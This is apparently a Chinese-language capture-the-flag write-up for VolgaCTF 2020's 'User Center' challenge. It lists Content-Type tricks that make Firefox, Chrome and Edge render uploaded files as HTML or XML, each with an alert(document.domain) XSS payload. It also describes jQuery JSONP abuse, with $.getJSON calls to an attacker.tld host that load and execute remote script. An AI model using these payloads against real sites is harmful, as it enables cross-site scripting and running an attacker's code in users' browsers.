VolgaCTF 2020 Qualifier User Center
mime绕过
题目过滤了html xml xsl
,且Content-Type
必须包含/
Firefox
-
如果
Content-Type
标头不包含/
字符,Firefox会尝试猜测文件类型。 此外,X-Content-Type-Options:nosniff
在这种情况下无效,因为Firefox仅在尝试连接<script src =>
和<link rel ="stylesheet" href =>
中具有错误内容类型的文件时才使用它。 -
text/rdf
被处理为xmlContent-Type: text/rdf <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
-
multipart/x-mixed-replace
支持HTML(示例)
如果缺少nosniff,Edge会处理类似于常规HTML的类型。Content-Type: multipart/x-mixed-replace;boundary=xxx xxx Content-Type:text/html <script>alert(document.domain)</script> xxx--
-
*/*
此时Firefox会猜测文件类型,无视X-Content-Type-Options:nosniff
-
text/plain;,text/html
支持多种逗号分隔类型Content-Type: text/plain;,text/html <script>alert(document.domain)</script>
Chrome
-
text/xsl
被处理为xmlContent-Type: text/xsl <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
-
text/plain;,text/html
支持多种逗号分隔类型Content-Type: text/plain;,text/html <script>alert(document.domain)</script>
Edge
text/vtt
被处理为htmlContent-Type: text/vtt <script>alert(document.domain)</script>
JSONP实现跨域
If the URL includes the string "callback=?" (or similar, as defined by the server-side API), the request is treated as JSONP instead. See the discussion of the jsonp data type in $.ajax() for more details.
因此,如果我们可以控制传递给$.getJSON
的URL,就可以XSS
callback的正则表达式更改:
> 1.7.2 /(=)\?(?=&|$)|\?\?/
<= 1.7.2 /(\=)\?(&|$)|\?\?/i
<= 1.5.1 /(\=)\?(&|$)|()\?\?()/i
<= 1.4.4 /\=\?(&|$)/
<= 1.4.2 /=\?(&|$)/
<= 1.2.1 /=(\?|%3F)/g
< 1.2 not supported
代码示例
$.ajax({url:'https://attacker.tld/??', dataType:'json'});
$.ajax({url:'https://attacker.tld/=?&', dataType:'json'});
$.getJSON('https://attacker.tld??');
$.getJSON('https://??.attacker.tld');
$.getJSON('https://xxx.com?callback??');
最后会被解析成https://xxx.com/?callbackjQueryxxx&_=[timestamp]
,然后将获取到的数据作为js执行